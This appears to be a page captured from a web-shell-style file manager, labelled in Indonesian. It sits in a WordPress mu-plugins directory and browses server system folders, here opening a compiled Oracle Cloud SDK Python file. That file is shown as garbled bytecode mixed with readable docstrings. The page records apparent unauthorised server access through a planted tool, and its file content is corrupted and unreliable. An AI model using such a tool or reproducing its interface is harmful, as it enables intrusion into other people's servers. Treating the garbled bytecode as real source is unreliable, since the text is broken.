📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
data_integration
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/data_integration/models
💾
Free:
45.9 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: oracle_write_attributes.pyc
a N��f� � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�AbstractWriteAttribute� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s~ e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z d d� Z dd� Zdd� ZdS )�OracleWriteAttributeszE Properties to configure when writing to an Oracle Database. c K sB ddddd�| _ ddddd�| _d | _d | _d | _d | _d | _d S )a Initializes a new OracleWriteAttributes object with values from keyword arguments. The default value of the :py:attr:`~oci.data_integration.models.OracleWriteAttributes.model_type` attribute of this class is ``ORACLE_WRITE_ATTRIBUTE`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param model_type: The value to assign to the model_type property of this OracleWriteAttributes. Allowed values for this property are: "ORACLEWRITEATTRIBUTE", "ORACLEATPWRITEATTRIBUTE", "ORACLEADWCWRITEATTRIBUTE", "OBJECTSTORAGEWRITEATTRIBUTE", "ORACLE_WRITE_ATTRIBUTE", "ORACLE_ATP_WRITE_ATTRIBUTE", "ORACLE_ADWC_WRITE_ATTRIBUTE", "OBJECT_STORAGE_WRITE_ATTRIBUTE" :type model_type: str :param batch_size: The value to assign to the batch_size property of this OracleWriteAttributes. :type batch_size: int :param is_truncate: The value to assign to the is_truncate property of this OracleWriteAttributes. :type is_truncate: bool :param isolation_level: The value to assign to the isolation_level property of this OracleWriteAttributes. :type isolation_level: str �str�int�bool)� model_type� batch_size�is_truncate�isolation_level� modelType� batchSize� isTruncate�isolationLevelN�ORACLE_WRITE_ATTRIBUTE)� swagger_types� attribute_map�_model_type�_batch_size�_is_truncate�_isolation_level)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/data_integration/models/oracle_write_attributes.py�__init__ s ��zOracleWriteAttributes.__init__c C s | j S )z� Gets the batch_size of this OracleWriteAttributes. The batch size for writing. :return: The batch_size of this OracleWriteAttributes. :rtype: int �r �r r r r r <